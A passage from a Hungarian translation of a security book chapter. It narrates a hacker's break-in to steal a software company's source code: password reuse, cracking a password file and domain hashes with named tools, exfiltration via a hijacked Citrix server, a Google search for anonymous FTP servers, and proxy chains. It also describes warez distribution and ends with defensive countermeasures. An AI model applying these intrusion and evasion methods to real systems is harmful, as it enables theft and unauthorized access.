általam áhított forráskódhoz. Leírtam a teljes nevüket, mindéül
részletet, amit csak meg tudtam szerezni. Aztán továbbmentem, és
jelszavakra kerestem rá a fickó teljes levelezőfájljában, és találtam
néhány regisztrációt, amelyek egyike valamilyen hálózati készüléket
szállító céghez tartozott.
E-mail címével és egy jelszóval létrehozott a cég támogatási oldalán
egy fiókot. És ugyanezt tette két vagy három másik szállító esetében is.
Találtam e-maileket, amelyek [a cégektől] jöttek vissza ezzel a
szöveggel: „Köszönjük a regisztrációt, felhasználói neve ez, jelszava
pedig az.” A jelszó „mypassword” volt két különbözőtársaságnál is.
Talán, igen, csak talán munka közben is ezt a jelszót használta. Az
emberek lusták, szóval egy próbálkozást mindenképpen megért.
Jó tipp volt. A jelszó valóban működött a cég szerverén levő egyik
fiókon. Ez azonban nem a Robert által remélt domain adminisztrátori
fiók volt, amely hozzáférést engedett volna a domain összes
felhasználójának felhasználói nevét és hash-elt jelszavát tároló
mesterfiókok adatbázishoz. Szemmel láthatóan egyetlen felhasználói
neve volt, amely különböző szintű hozzáférést biztosított attól függően,
hogy a domainbe vagy a helyi gépbe jelentkezett be vele. Robertnek
domain adminisztrátori hozzáférésre volt szüksége ahhoz, hogy
hozzáférést szerezzen a cég legtitkosabb rendszereihez, de a
rendszergazda más jelszót használt a domain adminisztrátori fiókhoz,
olyat, amit Robert nem ismert. – Ez letört – panaszolta.
Az egész dolog kezdett egy kicsit frusztráló lenni. – De aztán arra
gondoltam, hogy végeredményben talán megtalálhatom a jelszavát a
másik fiókhoz, ha más források között is körbenézek kicsit.
Nem sokkal később a helyzet elkezdett javulni. Rájött, hogy a cég
egy Visual SourceSafe nevű projektkezelő alkalmazást használt, és
sikerült hozzáférést szerezni a külső jelszófájlhoz, amely a rendszerhez
hozzáférő minden felhasználó számára olvasható volt. Egy ingyenes,
szabadon használható jelszótörő szoftverrel megtámadta a jelszófájlt,
„és talán másfél-két hétig tartott, mire sikerült egy másik jelszót
szerezni a fickóhoz”. Megtudta a rendszergazdának, aki után kajtatott,
egy másik jelszavát. Itt az idő egy kis ünneplésre.
Ezt a jelszót használta a domain adminisztrátori fiókhoz is, így
Robert hozzáférést szerzett minden olyan szerverhez, amelyekbe be
akart jutni.

Észrevételek a jelszavakról

A jelszavak nagyon személyes dolgok, mondja Robert. – Onnan


tudod, hogy szigorú céggel állsz szemben, ha mindenkinek alapos és
szigorú jelszót adnak. És onnan tudod, hogy a cég nagyon laza, ha az
alapértelmezett jelszó a hét egy napja vagy a cég neve vagy valami
ehhez hasonlóan butaság.
(Robert elmesélte nekem, hogy a cégnél, ahol dolgozik, minden
alkalmazott jelszava arra a napra van állítva, amikor munkába lépett.
Amikor valaki megpróbál bejelentkezni, „hét próbálkozást lehet tenni,
mielőtt a rendszer kizár, de persze nem kell ötnél többet kipróbálni”, ha
bárki megpróbál bejutni valamelyik fiókba.)
Robert azt tapasztalta, hogy a cégnél, ahova betörni kívánt, rengeteg
fiókon a következő formája volt az alapértelmezett jelszónak:
cégnév-2003
Egyetlen jelszót sem talált „2002”-vel vagy korábbi évszámmal, így
nyilvánvaló volt, hogy mindegyiket megváltoztatták az év első napján.
Zseniális jelszókezelés!

Teljes hozzáférés szerzése

Robert egyre közelebb érezhette magát a céljához. Az ahhoz a


rendszergazdához tartozó második jelszóval felszerelkezve, akinek
elektronikus személyiségét eltérítette, immár hozzáfért a teljes domain
jelszó hash-eihez. A PwDump2-t használta a hash-ek Elsődleges
Tartományvezérlőből történő kivonatolására, majd a l0phtCrack III-mal
feltörte a jelszavak többségét.
(Az utóbbi szuper trükk rainbow (szivárvány) táblákat használ,
amelyek jelszó hash-eket és a nekik megfelelő jelszavakat tartalmazó
táblák. A http://sarcaprj.wayreth.eu.org/ oldal megpróbálja feltörni a
megadott jelszó hash-t. Egyszerűen elküldjük a LAN Manager és az
NT hash-eket, illetve az e-mail címünket. A visszakapott e-mailben
benne lesz a jelszó. Robert így magyarázta ezt: – A jelszavak
létrehozásakor gyakran használt karakterkészletek alapján előre
előállítottak bizonyos hash-eket, így ahelyett, hogy rengeteg számítási
teljesítményre lenne szükségük, megvan nekik úgy 18-20 gigabájtnyi
előre generált hash és az azokhoz tartozó jelszavak. A számítógép
egyezőséget keresve nagyon gyorsan végigfut az előre kiszámított
hash-eken, egyenként megkérdezve, „ez az? Ez az? OK – ez az.” – A
rainbow tábla támadás másodpercekre csökkenti a feltörés idejét.)
Amikor a l0phtCrack végzett, Robertnek a domainben levő majdnem
minden felhasználó jelszava a birtokában volt. Ekkorra a korábban
eltérített e-mailek-ben levő információkból összerakta azon emberek
listáját, akik üzenetet váltottak a rendszergazdával. Az egyik ilyen
üzenet egy olyan alkalmazottól jött, aki egy elromlott szerverről írt,
panaszkodván, hogy „képtelen vagyok menteni bármilyen új változatot,
egyszerűen nem tudom fejleszteni a kódomat”. Nyilvánvalóan fejlesztő
volt, ami értékes információ volt Robert számára. Kikereste hát a
fejlesztő felhasználói nevét és jelszavát.
Betárcsázott, és bejelentkezett a fejlesztő belépési adataival. – A
nevében bejelentkezve mindenhez teljes hozzáférésem volt.
A „minden” ebben az esetben elsősorban a termék forráskódját
jelentette – „az volt a mennyország kulcsa”. És a kezében volt. – El
akartam lopni a forráskódot. Minden ott volt, amit akartam – meséli
boldogan.

A kód hazaküldése

Robert már szinte látta az általa kutatott arany izzását. Azonban még
meg kellett találnia a módját – a biztonságos módját – annak, hogy az
ajtajáig elszállítsa azt. – Elég terjedelmes fájlok voltak – mondja. – Azt
hiszem, a teljes forráskódfa úgy egy giga körül volt, ami több ki_tt
hétig is eltartott volna.
(Azért messze nem volt olyan rossz, mint egy hatalmas tömörített
fájlt letölteni l4,4K-s analóg modemen, amit én csináltam, amikor
évekkel ezelőtt több száz megabájtnyi VMS forráskódot másoltam le a
Digital Equipment Corporationtől.)
Mivel a forráskód ennyire hatalmas volt, sokkal gyorsabb
kapcsolatot akart az elküldéséhez. Ráadásul olyan szállítási útvonalat
szeretett volna, ami senkit nem fog egyszerűen elvezetni hozzá. A
gyors kapcsolat nem jelentett komoly problémát. Korábban feltört egy
Citrix MetaFrame-et használó másik USA-beli céget, amely egy volt az
Interneten levő sok másik könnyű célpont közül.
Robert VPN kapcsolatot hozott létre a célgépbe, és felmappelt egy
meghajtót oda, ahol a forráskód elhelyezkedett. Egyszerűen lemásolta.
– A Citrix szervert használtam a [szoftvercég] hálózatában való VPN-
ezéshez, majd rámentem a megosztásra. Aztán lemásoltam az összes
forráskódot, a bináris és egyéb adatokat a felhasználható Citrix
szerverre.
A fájlok továbbításának biztonságos és – reményei szerint –
lenyomozhatatlan útvonala felkutatására a kedvenc kereső motoromat,
a Google-t használta egy névtelen FTP szerver után kutatva. Egy ilyen
szerverre bárki tölthet fel fájlokat, és le is töltheti azokat egy
nyilvánosan elérhető könyvtárból. Ráadásul olyan névtelen FTP
szervert keresett, amelynek HTTP-n keresztül (webböngészőt
használva) elérhető könyvtárai is vannak. Úgy gondolta, hogy egy
névtelen FTP szerver használatával tevékenységét „elfedi a zaj”, mivel
sokan mások is használni fogják a szervert pornó anyagok, warez, zene
és filmek terjesztésére.
A következő keresési kifejezést használta a Google-ben:
index of parent incoming inurl:ftp
Ez névtelen hozzáférést engedélyezésére beállított FTP szerverek
után keres. A Google keresés által azonosított szerverek közül
kiválasztott egy olyat, amely megfelelt az előbb említett HTTP letöltési
feltételének, hogy böngészőjén keresztül letölthesse a kódot.
Miután a forrásfájlokat már átvitte a cégtől a feltört Citrix szerverre,
most ismét átküldte őket, ezúttal azonban a Google-val megkeresett
névtelen FTP szerverre.
Már csak egyetlen lépés volt hátra, mielőtt végre a birtokába került
az értékes forráskód: továbbítani kellett azt az FTP szetrverről a saját
számítógépére. Azonban „nem akartam, hogy az Internet címem az
egész forráskódot letöltse, és főleg ne órákon keresztül, ha érted, mire
gondolok.” így, mielőtt letöltötte volna a forráskódot az FTP szerverről,
kisebb csomagokba csomagolta őket, és ártatlan neveket adott nekik
(„gift.zip vagy valami hasonló”).
Ismét proxyszerverek láncolatát használta, hogy a kapcsolat nehezen
lenyomozható legyen. Robert így magyarázta el: – Körülbelül száz
nyitott Socks proxy van csak Tajvanon. És tudod, hogy minden
pillanatban legalább száz ember használja ezen proxyk bármelyikét. –
Szóval ha még be is kapcsolták a naplózást, ez hatalmassá duzzasztja a
naplókat, így elég valószínűtlen, hogy az öltönyös fickóknak sikerül
levadászniuk, és majd kopogtatni fognak az ajtón. – Olyan vagy, mint
egy tű a szénakazalban. Túl fáradtságos lenne az egész.
Végül számtalan erőfeszítés után az átvitel elindult.
Nem akartam elhinni, hogy a kódjuk letöltődik. Igazán komoly dolog
volt.

MEGOSZTÁS: A CRACKER VILÁGA

Mit tesz egy olyan hacker, mint Erik vagy Robert, ha a kezükbe
kerül a jól őrzött szoftver? Ami őket, illetve azokat illeti, akikre a
„cracker” vagy „szoftverkalóz” kifejezést használjuk, a válasz
egyszerű: többnyire sok, igen sok emberrel megosztják a kalózkodással
megszerzett szoftvert.
A megosztást azonban közvetve hajtják végre.
Erik elmesélte az általa két évig kajtatott szerverszofver megszerzése
utáni lépéseit. Az alkalmazás olyan programnyelven volt írva, amihez
nem nagyon értett, de volt egy barátja, aki azon a nyelven
programozott, így átküldte neki a forráskódot, hogy készítse el vagy a
licencelő biztonsági ellenőrzéseket kikerülő feltörő kódot vagy pedig a
regisztrációs kódot. Grafikus felhasználói felületet (GUI) helyezett a
lopott kulcselőállító fölé, hogy elrejtse a kód eredetét.
Odaadtam valakinek, aki feltöltötte a szoftvert a core Warez oldalak
egünkére, egy csomagba tömörítette az egészet, beletette a keygent, és
készített egy a telepítési és feltörési tudnivalókat tartalmazó
információsfájlt. Nem én magam raktam fel
Amikor már készen álltak, hogy feltöltsék a programot és keygent,
először utánanéztek, hogy valaki más esetleg feltörte-e már ugyanezt a
programot.
Mielőtt felraksz valamit, biztosra akarsz menni, hogy még senki nem
előzött meg, ezért csinálsz egy „duplikáció-ellenőrzést”, hogy biztos
egyedi legyen, amit felraksz.
A duplikáció-ellenőrzés (dupe check) könnyen megy. A cracker
egyszerűen felmegy a www.dupecheck.ru oldalra (az oldal
Oroszországban üzemel[2]), és beírja a termék nevét és verziószámát.
Ha fenn van a listán, az azt jelenti, hogy valaki más már feltörte, és
felrakta valamelyik core (meghatározó, igazán komoly tartalommal
rendelkező) Warez oldalra.
Azonban az, hogy a szoftvert felrakták az oldalra, nem jelenti azt,
hogy bárki letöltheti. Az oldal valójában jól láthatóan közölte, hogy
ZÁRT CSOPORT VAGYUNK, HÚZZ A P_BA
(A hiányzó betűk az oldalon természetesen ott voltak.)
Ha viszont a szóban forgó termék nem szerepelt még a listán, az azt
jelenti, hogy a cracker értékes vadat ejtett el. Ő lehet az első, aki feltölti
a szoftver megcrackelt változatát.
Amint feltöltik az új csomagot, a terjesztés gyorsan megkezdődik,
ahogy Erik elmesélte.
Körülbelül úgy 50 core Warez oldal van a világon, privát FTP
oldalak. Feltöltöd ezek egyikére, és talán egy órán belül a világ minden
részén található több ezer oldalra átmásolják a courierek.
Talán naponta úgy 50 és 200 között – mondjuk 100, igen, az elég jó
átlag. Naponta 100 programot törnek fel így.
A „courier” (futár), magyarázza Erik, olyan személy, aki az egyik
cracker oldalról a másikra mozgatja a „cuccot”. A courierek „az ellátási
lánc következő szintjén vannak”, a szoftvert feltörő srácok alatt.
A courierek három vagy négy különbözőoldalt figyelnek. Amint
valaki feltölt [egy megcrackelt alkalmazást] a Warez oldalra, és ők
észreveszik, hogy az valami új, akkor letöltik, és amilyen gyorsan csak
tudják, másokat megelőzve átküldik a három vagy négy másik oldalra.
Ekkor már úgy 20 oldalon megvan az anyag. Néha ez két-három
hónappal az előtt van, hogy [az új szoftver] megjelenne a boltokban.
A courierek következő szintje – olyan fickók, akik még nem
érdemelték ki a core Warez oldalakhoz való hozzáférést – észreveszi az
új anyagot, és ugyanezzel a módszerrel – amilyen gyorsan csak tudja,
hogy mindenki mást megelőzzön – letölti, majd máshova feltölti azt. –
És ez így szűrődik egyre lejjebb, és úgy egy óra alatt kétszer megkerüli
az egész világot – mondja Erik.
Az emberek krediteken keresztül érdemlik ki a hozzáférést a Warez
oldalakhoz, magyarázza Erik. A kredit a crackerek egyfajta pénzneme,
amit úgy lehet szerezni, ha valaki hozzájárul az oldal küldetéséhez, ami
nem más, mint a feltört szoftver terjesztése. A cracker szállítja
általában a programot és az érvényes licenckulcsot előállító vagy a
szoftvert más kerülő úton aktiváló eszközt is.
Egy cracker úgy gyűjthet krediteket, ha elsőként tölti fel a „crack”-et
egy olyan oldalra, ahol az még nincsen meg. Csak az új alkalmazást az
adott oldalra elsőként feltöltő személynek jár kredit.
Ezért igen motiváltak arra, hogy gyorsan csinálják. így semmi perc
alatt eljut mindenhova. Ennél a pontnál az emberek másolatot
csinálnak róla a saját crackoldalukon vagy hírcsoportjukon.
Az olyanok, mint én, vagyis akik feltörik a cuccot, mindig korlátlan
hozzáférést kapnak – ha cracker vagy, azt akarják, hogy mindig nekik
add a jó cuccokat, amikor elsőként sikerül feltörni őket.
Egyes oldalakon megtalálható a teljes program és a keygen is. –
Azonban sok crackeroldal – magyarázza Erik – nem rakja fel a
programot, csak a keygent. Azért, hogy kisebbek legyenek [a fájlok], és
így talán kevésbé valószínű, hogy a szövetségiek bezáratják őket.
Az összes ilyen oldalhoz, nem csak a hierarchia tetején levő core,
hanem a három-négy szinttel lejjebb levő Warez oldalakhoz is „nehéz
hozzáférni. Mind privátok”, mert ha az oldal egyik címe ismertté válik,
„a szövetségiek nem csak bezáratják azt, hanem ráadásul letartóztatják
az embereket, elveszik a számítógépeiket, és letartóztatnak mindenkit,
aki valaha az oldalon volt”, mivel ezek az FTP oldalak végül is komoly
mennyiségű lopott szellemi tulajdont tárolnak.
Nem is nagyon megyek már ezekre az oldalakra. A kockázatok miatt
nagyon ritkán megyek csak. Felmegyek, ha szükségem van valami
szoftverre, de soha nem én magam töltöm fel a szoftvert.
Azért ilyen nagyon érdekes, mert hihetetlenül hatékony. Úgy értem,
milyen más üzleti területen van ilyen terjesztési rendszer, amiben
mindenki érdekelt, mert kapni akar valamit.
Crackerként hozzáférést adnak nekem ezekhez az oldalakhoz, mert
minden oldal jó crackereket akar, mert így lesz több courierjük. A
courierek pedig hozzáférést akarnak a jó oldalakhoz, mert onnan
szerzik a jó cuccokat.
A csoportom nem enged be új embereket. És vannak bizonyos
dolgok, amiket nem adunk ki. Például az egyik nyáron kiadtuk a
Microsoft Office-t, de az nagyon kockázatos volt. Azt követően
elhatároztuk, hogy soha többé nem foglalkozunk ilyen nagy nevekkel.
Egyes srácok beindulnak, nagyon agresszíven csinálják, és árulják a
CD-ket. Különösen olyankor, amikor elkezdik pénzért csinálni, jobban
felhívják magukra a figyelmet. Általában őket szokták elkapni.
Idáig csak a szoftverekről beszéltünk, de ugyanez történik a zenével
és a filmekkel is. Egyes filmoldalakon két vagy három héttel a
mozipremier előtt hozzájuthatsz a filmekhez. Általában a forgalmazó
vagy a sokszorosító cég egy alkalmazottja szerzi meg a filmet. Mindig
valaki belsős.

BETEKINTÉS

Erik a gyűjteményét teljessé tevő utolsó szerverszoftver csomag


utáni kutatásának tanulsága: úgy látszik, a természetben nem létezik
olyan, hogy tökéletesség, és ez még sokkal inkább igaz, ha az
embereket is belekeverjük a dologba. Az általa célba vett cég nagyon
biztonságtudatos volt, és kitűnő munkát végzett a számítógépes
rendszereik védelmében. Ennek ellenére egy eléggé képzett, eléggé
eltökélt és a támadásra elegendő időt rászánó hackert majdnem
lehetetlen távol tartani.
Ó, persze, valószínűleg elég szerencsések leszünk ahhoz, hogy nem
találkozunk olyan eltökélt támadókkal, mint Erik vagy Robert, akik
hihetetlen mennyiségű időt és energiát szánnak erőfeszítéseikre. De mi
van akkor, ha egy gátlástalan versenytárs felbérel egy underground
szakemberekből álló csapatot – hackerek egy olyan csoportját, akik
mindegyike hajlandó napi 12-14 órát rászánni, és még szeretik is a
munkájukat?
És mi történik, ha a támadók találnak egy hibás téglát a szervezet
elektronikus védőfalában? Erik szerint „amikor valaki olyan mélyen
bejut a hálózatodba, ahogy én bejutottam, soha, soha nem fogod onnan
kiűzni. Örökre bennmarad.” Úgy véli, hogy „hihetetlen nagyjavításra,
az összes jelszó egy napon, egyszerre történő megváltoztatására, az
összes rendszer újratelepítésére, majd mindennek az egyszerre történő
biztonságossá tételére lenne szükség ahhoz, hogy kizárják a támadót”.
És mindezt úgy kellene megcsinálni, hogy egyetlen dologról sem
feledkezhetnek meg. – Ha csak egyetlen ajtót nyitva hagysz, semmi
időn belül megint ott leszek.
Saját tapasztalataim is alátámasztják a véleményét. Amikor
középiskolába jártam, behackeltem a Digital Equipment Corporation
Easynetjébe. Tudták, hogy van benn egy behatoló, de nyolc éven
keresztül a biztonsági osztály legjobb koponyái sem tudtak kizárni
onnan. Végül megszabadultak tőlem – persze nem saját maguktól,
hanem a kormányzat volt olyan kedves, és üdülési csomagot ajánlott
nekem az egyik szövetségi nyaralóhelyen.

ÓVINTÉZKEDÉSEK

Habár igen eltérő támadásokról volt szó és a két hacker


meglehetősen sok sebezhetőségnek köszönhette a sikert, igen
figyelemreméltó, hogy az óvintézkedések nagy része mindkét támadás
ellen védelmet jelent(ett volna). Ennek a két történetnek a legnagyobb
tanulságai az alábbiak.

Céges tűzfalak

A tűzfalakat úgy kellene beállítani, hogy csak a céges igények


kielégítéséhez szükséges lényeges szolgáltatásoknak engedjenek
hozzáférést. Hasonlóan gondosan kellene eljárni annak érdekében,
hogy csak a cég által ténylegesen igényelt szolgáltatások legyenek
elérhetők. Ezen túlmenően érdemes mérlegelni egy állapotvezérelt
(stateful inspection) típusú tűzfal használatát. Egy ilyen típusú tűzfal
magasabb szintű biztonságot nyújt azáltal, hogy az időben figyelemmel
kíséri a csomagokat. A bejövő csomagokat csak akkor engedi be, ha
azok egy kimenő kapcsolatra válaszolnak. Más szavakkal ez azt jelenti,
hogy a tűzfal a kimenő forgalom alapján csak adott portoknak nyitja
meg a kapuit. És szabálykészlet bevezetésével ellenőrizni kell a kimenő
hálózati kapcsolatokat. A tűzfalat felügyelő rendszergazda
rendszeresen nézze át a tűzfal beállításait és a naplókat, és ellenőrizze,
hogy jogosulatlan változtatásokat ne hajtsanak végre. Ha bármely
hacker feltöri magát a tűzfalat, igen valószínű, hogy finom
módosításokkal előnyt kovácsol ebből.
Ha megoldható, mérlegeljük a VPN-hez való hozzáférés a kliens IP-
címe alapján történő ellenőrzését. Ez ott lehetséges, ahol csak
korlátozott számú alkalmazott csatlakozik a VPN-en keresztül a céges
hálózathoz. Ezen túlmenően mérlegeljük a VPN hitelesítés egy
biztonságosabb formájának megvalósítását, a statikus jelszavak helyett
például smartkártyák vagy kliensoldali tanúsítványok használatát.

Személyi tűzfalak

Erik betört az ügyvezető számítógépébe, és észrevette, hogy


személyi tűzfal fut rajta. A tűzfal nem állította meg, mivel általa
engedélyezett szolgáltatást használt ki. Egy a Microsoft SQL szerver
által alapértelmezésben bekapcsolt, eltárolt eljáráson keresztül
parancsokat küldhetett. Ez újabb példa a tűzfal által nem védett
szolgáltatásokkal való visszaélésre. Az áldozat jelen esetben soha nem
vette a fáradtságot, hogy átvizsgálja a terjedelmes tűzfalnaplókat,
amelyek több mint 500K-nyi naplózott tevékenységet tartalmaztak. Ez
nem kivételes eset. Számos szervezet alkalmaz behatolásmegelőző és
észlelő technológiákat, és azt várják, hogy a technológia – miután
kivették a dobozból – majd kezeli önmagát. Mint láttuk, ez a felelőtlen
viselkedés lehetővé teszi, hogy a támadás észrevétlen maradjon.
A tanulság egyértelmű: gondosan fejlesszük ki a tűzfal
szabályrendszerét, hogy az a cég üzleti szükségletei szempontjából
lényegtelen szolgáltatásokon kimenő és bejövő forgalmat egyaránt
zárja ki, illetve a jogosulatlan változtatások és a biztonsági támadási
kísérletek felismerése érdekében rendszeresen tekintsük át a
tűzfalszabályokat, illetve a naplókat.
Ha egy hacker betör valahova, a későbbi visszatérés lehetősége
érdekében valószínűleg eltérít egy alvó rendszert vagy felhasználói
fiókot. Egy másik szóba jöhető taktika a jogosultságok vagy csoportok
hozzáadása létező, már megcrackelt fiókokhoz. A felhasználói fiókok,
csoportok, fájlelérési jogosultságok rendszeres ellenőrzése megfelelő
módszer a lehetséges behatolások vagy a jogosulatlan belső
tevékenység azonosítására. Számos kereskedelmi forgalomban
kapható, illetve ingyenes biztonsági eszköz létezik, amelyekkel e
folyamat egy része automatizálható. Mivel ezzel a hackerek is tisztában
vannak, fontos a biztonsághoz kapcsolódó eszközök, szkriptek és
ezekkel kapcsolatban használt forrásadatok sértetlenségének rendszeres
időközönként történő vizsgálata.
Számtalan behatolás az olyan hibás rendszerkonfigurációk közvetlen
következménye, mint például a túl sok nyitott port, a gyenge fájlelérési
jogosultságok vagy a hibásan beállított webszerverek. Amint a
támadónak sikerül a rendszert felhasználói szinten feltörnie, a támadás
következő lépése a jogosultságok kiterjesztése lesz az ismeretlen vagy
biztonsági javításokkal nem orvosolt sebezhetőségek, illetve a gyengén
konfigurált jogosultságok kihasználásával. Ne feledjük, hogy a
támadók sokszor apró lépések egész sorozatát követik el, mire sikerül a
teljes rendszert feltörniük.
A Microsoft SQL Servert használó adatbázis-rendszergazdáknak
mérlegelnie kellene a további rendszerhozzáférések megszerzésére
használt bizonyos tárolt eljárások (például az xp cmdshell, xp
makewebtask és xp regread) kikapcsolását.

Portszkennelés

Miközben ezt olvassa, az Internethez csatlakozó számítógépét


valószínűleg éppen egy számítógépőrült tapogatja le „könnyen
leszakítható gyümölcs” után kutatva. Mivel az Egyesült Államokban
(és a legtöbb másik országban is) legális a ponszkennelés, a támadóval
szembeni válaszlépéseink köre némileg korlátozott. A legfontosabb
tényező a komoly fenyegetéseknek a több ezer szkriptkölyök
gyakorlatilag ártalmatlan próbálkozásától való megkülönböztetése.
Többféle termék, köztük tűzfalak és behatolásérzékelő rendszerek
léteznek, amelyek képesek azonosítani a portszkennelések különböző
típusait, és riasztják a megfelelő alkalmazottakat. A legtöbb tűzfal
beállítható úgy, hogy azonosítsa a portszkennelést, és annak
megfelelően megszakítsa a kapcsolatot. A kereskedelmi forgalomban
kapható számos tűzfalterméknek van olyan beállítási lehetősége, hogy
megakadályozzák a gyors portszkennelést. Vannak „nyílt forráskódú”
eszközök is, amelyek képesek a portszkennelések azonosítására, és
adott esetben egy ideig visszadobják a csomagokat.

Ismerjük meg a rendszerünket

Számos rendszerkezelői feladatot kell az alábbiak érdekében


végrehajtani:
Nézzük át a folyamatok listáját szokatlan vagy ismeretlen
folyamatok után kutatva.
Vizsgáljuk át a programok listáját jogosulatlanul hozzáadott
programok vagy változtatások után kutatva.
Nézzük át a fájlrendszert új vagy módosított rendszerfájlok,
szkriptek vagy alkalmazások után kutatva.
Vizsgáljuk meg, ha váratlanul lecsökken a szabad lemezterület.
Ellenőrizzük, hogy a rendszer– vagy felhasználói fiókok mind
aktívak-e, az alvó vagy ismeretlen fiókokat pedig távolítsuk el.
Ellenőrizzük, hogy az alapértelmezetten telepített különleges fiókok
úgy vannak-e beállítva, hogy nem engedik az interaktív vagy hálózati
bejelentkezési azonosítókat.
Ellenőrizzük, hogy a rendszerkönyvtárakhoz és fájlokhoz megfelelő
fájlelérési jogok vannak-e beállítva.
Nézzük át a rendszernaplókat különös tevékenység után kutatva
(például ismeretlen eredetű vagy furcsa időpontokban, például éjszaka
vagy hét végén történő távoli hozzáférések).
Ellenőrizzük le a webszervernaplókat a jogosulatlan fájlok elérésére
irányuló kérések azonosítására. A támadók, ahogy azt ebben a
fejezetben láttuk, a webszerver könyvtárba másolják a fájlokat, és a
weben keresztül (HTTP) fogják azokat letölteni.
FrontPage vagy WebDav alkalmazásokat futtató webszerver
környezetekben meg kell győződni a megfelelő jogosultságok
beállításáról, hogy jogosulatlan felhasználók ne férhessenek hozzá a
fájlokhoz.

A támadásra adott válasz és a riasztás


Ha tisztában vagyunk a folyamatban levő támadással, az segít a
károk mértékének mérséklésében. A potenciális biztonsági támadások
azonosítása érdekében kapcsoljuk be az operációs rendszer auditálást.
Alkalmazzunk automatikus rendszert, amely bizonyos típusú auditálási
esemény megtörténtekor riasztja a rendszergazdát. Fontos megjegyezni
azonban, hogy amennyiben a támadó megfelelő jogosultságokat szerez,
és tudomása van az auditálásról, megkerülheti az automatizált riasztó
rendszert.

Jogosulatlan változtatások észlelése az alkalmazásokban

Robert a FrontPage egy hibás beállítását kihasználva képes volt


lecserélni a helpdesk.exe alkalmazást. Miután elérte célját és
megszerezte a cég vezető termékének forráskódját, fennhagyta a
helpdesk alkalmazás „meghackelt” változatát, hogy később bármikor
visszatérhessen. Egy túlterhelt rendszergazda talán soha nem veszi
észre, hogy egy hacker titokban módosított egy létező programot,
különösen akkor nem, ha egyáltalán nem végez sértetlenségi
ellenőrzést. A manuális ellenőrzések egyik lehetséges alternatívája egy
olyan program licencelése, mint például a Tripwire[3], amely
automatizálja a jogosulatlan változtatások észlelésének folyamatát.

Engedélyek

Erik azzal tudott bizalmas adatbázisjelszavakat megszerezni, hogy


megnézte az /includes könyvtárban levő fájlokat. E kiinduló jelszavak
nélkül képtelen lett volna végrehajtani küldetését. Csupán annyit kellett
tennie a bejutáshoz, hogy a titkos adatbázisjelszavakat megjelenítse
egy bárki által olvasható (world-readable) forrásfájlban. A legjobb
biztonsági gyakorlat annak elkerülése, hogy nyílt szöveges jelszavakat
batch–, forrás– vagy szkriptfájlokban tároljunk. Vállalat szintű
biztonsági irányelvet kell használni, amely a semmiképpen nem
elkerülhető eseteket leszámítva megtiltja a jelszavak nyílt szöveges
tárolását. A nem titkosított jelszavakat tartalmazó fájlokat azonban még
a legrosszabb esetben is gondosan védeni kell a nem szándékolt
napvilágra kerüléstől.
A Robert által megtámadott cégnél a Microsoft IIS4 szervben nem
megfelelően konfigurálták ahhoz, hogy megakadályozza, hogy a
névtelen vagy vendég felhasználók fájlokat olvassanak, vagy a
webszerver könyvtárba írják őket.
A Microsoft Visual SourceSafe programmal kapcsolatosan használt
külső jelszófájl a rendszerbe bejelentkezett bármely felhasználó
számára olvasható volt. E hibás beállítások miatt a támadó teljes
irányítást szerezhetett a cél Windows-os tartománya felett. Olyan
rendszerek alkalmazása, amelyek rendezett könyvtárstruktúrát
használnak az alkalmazásokhoz és adatokhoz, nagyban növelhetik a
hozzáférési vezérlők hatékonyságát.

Jelszavak

Az ebben a fejezetben bemutatott támadók sikere a könyv más


részeiben leírt egyéb gyakori jelszókezelési javaslatokon túlmenően
további fontos pontokra hívja fel a figyelmet. Erik megjegyezte, hogy
az általa feltört jelszavak alapján képes volt megjósolni a mintát, ahogy
a többi céges jelszót kialakították. Ha a cégünk valamilyen módon
sztenderdizált, előre jelezhető módszert használ, amit az
alkalmazottaknak be kell tartaniuk jelszavaik létrehozásakor, akkor
nem árt tudnunk, hogy nyitott ajtóval várjuk a hackereket.
Ha egy támadó privilegizált hozzáférést szerez egy rendszerhez, igen
fontossá válik számára más felhasználók vagy adatbázisok jelszavának
megszerzése. Ezt olyan gyakran használt taktikákkal érheti el, mint az
e-mailek vagy akár a teljes fájlrendszer átvizsgálása az e-mailekben,
szkriptekben, kötegelt fájlokban, forráskódokban és munkalapokon
levő nyílt szöveges jelszavak után.
Windows operációs rendszert használó szetrvezeteknek mérlegelniük
kellene az operációs rendszer olyan beállítását, hogy a LAN Manager
jelszó hash-ek ne a registryben legyenek tárolva. Ha egy támadó
rendszergazdai hozzáférési jogosultságokat szerez, kivonatolhatja a
jelszó hash-eket, és megkísérelheti feltörni őket. Az informatikai
személyzet könnyedén beállíthatja a rendszert úgy, hogy a régi típusú
hash-ek ne kerüljenek eltárolásra, ami jelentősen megnöveli a jelszavak
feltörésének nehézségét. Ha azonban egy támadó „megszerzi” a
gépünket, lehallgathatja a hálózati forgalmat, vagy külsős
segédalkalmazást telepíthet a fiókjelszavak megszerzése érdekében.
A LAN Manager jelszó hash-ek kikapcsolásával egyenértékű az
olyan karakterkészletű jelszavak létrehozása, amely karakterek nem
érhetők el a billentyűzet <Alt> billentyűje és az adott karakter
numerikus azonosítójával (ahogy arról a 6. fejezetben már szó volt). A
széles körben használt jelszófeltörő programok meg sem kísérlik a
görög, héber, latin és arab ábécében levő ilyen karaktereket használó
jelszavak feltörését.

Külsős (harmadik fél által készített) alkalmazások

Az egyedileg készített webletapogató eszközökkel Erik egy


kereskedelmi forgalomban kapható FTP termék által előállított, nem
védett naplófájlt fedezett fel. A napló a rendszerre és a rendszerről
továbbított minden egyes fájl elérési útvonalának információit
tartalmazta. Harmadik fél által készített szoftver telepítésénél ne
támaszkodjunk az alapértelmezett beállításokra. Olyan konfigurációt
valósítsunk meg, amely legkevésbé valószínű, hogy értékes
információkat, például további támadásokhoz felhasználható
naplóadatokat szivárogtat ki.

Megosztott állományok védelme

A hálózati megosztások alkalmazása gyakori módszer a céges


hálózaton levő állományok és könyvtárak megosztására. Az
informatikai személyzet dönthet úgy, hogy nem osztanak ki jelszavakat
vagy jogosultságokat a hálózati megosztásokhoz, hiszen azok csupán a
belső hálózaton érhetők el. Ahogy a könyvben többször elmondtuk,
számtalan szervezet csak a megfelelő határvédelemre összpontosítja az
erejét, és nem foglalkoznak a hálózat belső részének biztosításával.
Akárcsak Robert, a hálózatba bejutó támadók is értékes, bizalmas
információt ígérő nevű megosztások után fognak kutatni. Az olyan
beszélő nevek, mint a „research” (kutatás) vagy „backup” csak
megkönnyítik a támadó dolgát. A legjobb gyakorlat a bizalmas
információt tartalmazó hálózati megosztások megfelelő védelme.

A DNS tippelés megelőzése

Robert egy DNS tippelő programot használt a tartomány nyilvánosan


elérhető zónafájljában levő lehetséges hostnevek azonosítására. A belső
